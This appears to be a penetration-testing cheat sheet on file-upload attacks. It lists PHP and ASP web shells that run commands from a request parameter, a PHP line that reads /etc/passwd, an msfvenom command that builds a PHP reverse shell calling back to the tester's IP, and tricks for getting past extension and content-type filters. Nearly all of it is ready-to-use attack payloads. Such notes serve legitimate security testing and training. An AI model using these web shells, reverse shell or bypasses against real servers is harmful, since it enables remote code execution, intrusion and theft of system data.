File-upload-attacks

gi### Web Shells

<?php file_get_contents('/etc/passwd'); ?>
### Basic PHP File Read

<?php system('hostname'); ?>
### Basic PHP Command Execution

<?php system($_REQUEST['cmd']); ?>
### Basic PHP Web Shell
<% eval request('cmd') %>
### Basic ASP Web Shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
### Generate PHP reverse shell

Web/Reverse Shells

Bypasses

[CTRL+SHIFT+C]
### Client-Side Bypass: Toggle Page Inspector

Blacklist Bypass

  • shell.phtml ### Uncommon Extension

  • shell.pHp ### Case Manipulation

Whitelist Bypass

  • shell.jpg.php ### Double Extension

  • shell.php.jpg ### Reverse Double Extension

  • %20, %0a, %00, %0d0a, /, .\, ., … ### Character Injection - Before/After Extension

Content/Type Bypass

Limited Uploads

Potential Attack
File Types

XSS

HTML, JS, SVG, GIF

XXE/SSRF

XML, SVG, PDF, PPT, DOC

DoS

ZIP, JPG, PNG

Last updated